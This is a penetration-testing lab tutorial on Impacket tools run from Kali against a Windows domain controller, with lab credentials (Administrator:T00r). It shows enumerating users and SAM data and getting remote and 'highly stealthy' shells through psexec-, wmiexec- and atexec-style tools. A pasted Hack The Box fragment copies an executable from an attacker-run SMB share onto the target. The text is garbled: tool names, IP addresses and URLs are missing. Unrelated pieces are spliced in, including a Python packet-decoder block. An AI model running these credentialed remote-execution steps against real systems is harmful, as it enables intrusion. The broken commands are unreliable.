Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and, for some protocols (e.g. SMB1-3 and MSRPC), the protocol implementation itself. According to the Core Security website, Impacket supports protocols such as IP, TCP, UDP, ICMP, IGMP, ARP, IPv4, IPv6, SMB, MSRPC, NTLM, Kerberos, WMI and LDAP.

For the following practical we will require two systems:

  1. A Windows Server with a Domain Controller configured
  2. A Kali Linux machine

Here, in our lab scenario, we have configured the following settings on our systems.

Windows Server Details

  • Domain: SERVER
  • User: Administrator
  • Password: T00r
  • IP Address:

Kali Linux:

Before beginning with the Impacket tools, let's run an Nmap version scan against the target Windows server to get information about the services it is running.

nmap -sV

As you can see in the above screenshot, we have domain services, Kerberos services, NetBIOS services, LDAP services and Windows RPC services.

Now let’s install the Impacket tools from GitHub. You can get it from here.

First, clone the git repository, and then install Impacket as shown in the screenshot.

git clone

cd impacket/

python install

This will install Impacket on your Kali Linux. After installation, let's look at the different tools Impacket ships with.

cd impacket/examples

These are some of the tools included in Impacket; let's try a few of them.

Simple ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host. If the remote host is up, it should reply to the echo probe with an echo-reply packet.


Syntax: ./ [Source IP] [Destination IP]


A Windows SID bruteforcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@

As you can see, the lookupsid tool has extracted the user and group information from the server.

It lets you execute processes on remote Windows systems, copy files to remote systems, process their output and stream it back. It allows execution of remote shell commands directly in a fully interactive console without having to install any client software.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@

As you can see, we got a remote shell on the server in the given screenshot (note: if the last character of the password is "!", you get the error "bash: !@ event not found", because bash treats "!" as history expansion).

This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well-known endpoints.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@

As you can see below, we have the list of RPC endpoints registered on the target.

An application that communicates with the Security Account Manager Remote (SAMR) interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@
As you can see below, we have extracted SAM information from the target server.

root@kali:~/htb/dropzone/share# impacket-smbserver share ./
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed

c:\windows\system32>copy \\\share\whoami.exe
copy \\\share\whoami.exe
1 file(s) copied.

KALI htb/tally# impacket-smbserver share ./ -smb2support
LT-JACCO Group Policy Editor: Enable insecure guest logons

Since the "Windows 10 Fall Creators Update", guest access in SMB2 is disabled by default.

You can change this setting within your group policy settings:

  1. In the Run box, type "gpedit.msc".
  2. In the Local Group Policy Editor, select "Administrative Templates".
  3. If you want to enable insecure guest access, configure the following Group Policy setting:
     Computer configuration\administrative templates\network\Lanman Workstation
     "Enable insecure guest logons"
  4. Select OK.

Simple packet sniffer that uses the pcapy library to listen for packets in transit over the specified interface.

./

Choose the interface using the number associated with it, and the sniffing starts.

Simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols.

./

The sniffer then starts to monitor ICMP, TCP and UDP traffic.
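The ping example and both sniffers above work at the level of raw IPv4 packets. As an added illustration (this is not Impacket code, and it deliberately does not open a raw socket, which needs root), the following stdlib-only Python builds a constructed echo-reply and a TCP SYN, decodes the IPv4 header, verifies the IP and ICMP checksums, and classifies the ICMP/TCP/UDP header that follows. The addresses and function names are assumptions.

```python
import struct

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; over a valid header (checksum included) it yields 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                               # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def decode_ipv4(pkt: bytes) -> dict:
    """Decode an IPv4 header and the ICMP (1) / TCP (6) / UDP (17) header behind it."""
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _csum, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4                       # header length in bytes
    info = {"src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)), "ttl": ttl,
            "proto": proto, "ip_checksum_ok": inet_checksum(pkt[:ihl]) == 0}
    payload = pkt[ihl:total_len]
    if proto == 1:                                   # ICMP: type 8 = echo, 0 = echo-reply
        icmp_type, code = struct.unpack("!BB", payload[:2])
        info["icmp"] = {"type": icmp_type, "code": code,
                        "kind": {8: "echo-request", 0: "echo-reply"}.get(icmp_type, "other"),
                        "checksum_ok": inet_checksum(payload) == 0}
        if icmp_type in (0, 8):                      # echo messages carry identifier + sequence
            info["icmp"]["id"], info["icmp"]["seq"] = struct.unpack("!HH", payload[4:8])
    elif proto == 6:                                 # TCP: ports and the 9 flag bits
        sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", payload[:14])
        info["tcp"] = {"sport": sport, "dport": dport, "flags": off_flags & 0x1FF}
    elif proto == 17:                                # UDP: ports and length
        sport, dport, length = struct.unpack("!HHH", payload[:6])
        info["udp"] = {"sport": sport, "dport": dport, "length": length}
    return info

def build_icmp_echo(icmp_type: int, ident: int, seq: int, data: bytes = b"") -> bytes:
    """Build an ICMP echo/echo-reply message with a correct checksum."""
    hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    return struct.pack("!BBHHH", icmp_type, 0, inet_checksum(hdr + data), ident, seq) + data

def build_ipv4(src: str, dst: str, proto: int, payload: bytes, ttl: int = 64) -> bytes:
    """Wrap a payload in a minimal 20-byte IPv4 header with a correct checksum."""
    to_bytes = lambda ip: bytes(int(o) for o in ip.split("."))
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0, ttl, proto,
                      0, to_bytes(src), to_bytes(dst))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:] + payload

# Constructed samples with assumed lab addresses (not captures from the original page):
# an echo-reply as the ping tool expects, and a TCP SYN to port 445 as the sniffer would show.
SAMPLE_ECHO_REPLY = build_ipv4("10.0.0.5", "10.0.0.1", 1, build_icmp_echo(0, 0x4242, 1, b"impacket"))
SAMPLE_TCP_SYN = build_ipv4("10.0.0.1", "10.0.0.5", 6, struct.pack("!HHIIHHHH", 40000, 445, 1, 0, 0x5002, 8192, 0, 0))
```

Feeding `decode_ipv4` the bytes read from a raw socket gives the same per-packet summary the sniffer prints, and the checksum checks flag corrupted or spoofed-looking packets.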

It generates a semi-interactive shell, used through Windows Management Instrumentation. It does not require installing any service/agent on the target server. It runs as Administrator. It is highly stealthy.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@

As you can see below, we have the shell from the target server.

It allows you to issue WQL queries and get descriptions of WMI objects on the target system.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@
This will open a shell where you can run WQL queries such as:
SELECT * FROM Win32_LogicalDisk WHERE FreeSpace < 209152

This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address] [Command]

./ SERVER/Administrator:T00r@ systeminfo
As you can see below, a remote connection was established to the server, the command systeminfo was run on the target server, and the output of the command was delivered to the Kali terminal.

This script will connect to a target machine (or a list of targets) and gather the installed OS architecture type by (ab)using a documented MSRPC feature.


Syntax: ./ -target [IP Address]

Command: ./ -target

Here we can see that the architecture of the target system is 64-bit.


This script will bind to the target's MGMT interface to get a list of interface IDs. It will check that list against another list of known interface UUIDs and report whether each interface is listed and/or listening.

Syntax: ./ [Host IP Address] [Port]

./ 135

./ 49154

Author: Jacco Straathof